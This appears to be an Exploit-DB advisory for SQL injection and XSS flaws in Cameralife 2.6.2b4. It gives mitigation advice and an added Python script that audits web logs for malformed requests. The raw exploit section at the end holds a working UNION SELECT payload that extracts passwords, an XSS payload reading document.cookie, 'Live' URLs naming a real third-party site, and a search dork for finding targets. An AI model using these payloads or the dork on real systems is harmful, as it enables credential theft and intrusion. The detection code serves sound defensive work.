vendor: Cameralife
by: BackDoor
CVSS: 8.8 HIGH
SQL Injection and XSS
CWE: 89, 79
Product Name: Cameralife
Affected Version From: 2.6.2b4
Affected Version To: 2.6.2b4
Patch Exists: YES
Related CWE: N/A
CPE: a:cameralife:cameralife:2.6.2b4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Cameralife 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities

Cameralife 2.6.2b4 is vulnerable to remote SQL injection and cross-site scripting (XSS). An attacker can exploit either issue by sending a specially crafted URL to the target application. In album.php, the id parameter accepts a malicious SQL query (a UNION SELECT in the published example) which can be used to extract sensitive information, such as usernames and passwords from the users table, from the database. In topic.php, the name parameter lets the attacker inject malicious JavaScript code into the application, which can be used to steal user credentials or perform other malicious activities.

Mitigation:

The application should be patched to the latest version and input validation should be implemented to prevent malicious input from being accepted.
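The same validation rules can be applied to web server access logs to find requests against the two affected scripts that a patched application would have rejected. The Python below is an added example, not code from Cameralife or from the original advisory. It assumes that legitimate album.php id values are plain non-negative integers and that topic.php name values never contain <, > or double quotes; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Oct/2008:10:00:01 +0000] "GET /cameralife/album.php?id=42 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [09/Oct/2008:10:00:05 +0000] "GET /cameralife/album.php?id=-1+union+select+0,password,username,3,4,5+from+users HTTP/1.1" 200 812',
    '203.0.113.7 - - [09/Oct/2008:10:00:09 +0000] "GET /cameralife/topic.php?name=Holidays+2008 HTTP/1.1" 200 4300',
    '198.51.100.9 - - [09/Oct/2008:10:00:12 +0000] "GET /cameralife/topic.php?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 4410',
    '203.0.113.7 - - [09/Oct/2008:10:00:15 +0000] "GET /cameralife/index.php HTTP/1.1" 200 9000',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r'[<>"]')  # assumed never valid in a topic name


def check_request(target):
    """Return a finding if a parameter breaks its expected shape, else None."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    # parse_qs percent-decodes values and turns '+' into a space,
    # so encoded payloads are inspected in their decoded form.
    params = parse_qs(parts.query, keep_blank_values=True)
    if script == "album.php":
        for value in params.get("id", []):
            if not re.fullmatch(r"\d+", value):
                return "album.php: non-numeric id"
    elif script == "topic.php":
        for value in params.get("name", []):
            if MARKUP_RE.search(value):
                return "topic.php: markup characters in name"
    return None


def audit(lines):
    """Return (line number, finding) for every log line that fails validation."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            finding = check_request(match.group(1))
            if finding:
                findings.append((lineno, finding))
    return findings


if __name__ == "__main__":
    for lineno, finding in audit(SAMPLE_LOG):
        print(f"line {lineno}: {finding}")
```

A hit in the logs shows only that a malformed request was received; whether it succeeded depends on the version that was running at the time.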

Exploit-DB raw data:

Cameralife 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities
Script:Cameralife 2.6.2b4
Download:http://nchc.dl.sourceforge.net/sourceforge/fdcl/cameralife-2.6.2b4.zip
Author:BackDoor
Bug 1;album.php Remote SQL Injection Vulnerability
Exploit:www.target.com/scriptpath/album.php?id=-1+union+select+0,password,username,3,4,5+from+users
Live
http://chrisnolan.org/cameralife/album.php?id=-1+union+select+0,password,username,3,4,5+from+users
Bug 2;topic.php XSS Vulnerability
Exploit:www.target.com/scriptpath/topic.php?name="><script>alert(document.cookie)</script>
Live
http://chrisnolan.org/cameralife/topic.php?name="><script>alert(document.cookie)</script>
Dork:inurl:"cameralife/index.php"
BackDoor Cyber-Security.TIM //Lojistik

# milw0rm.com [2008-10-09]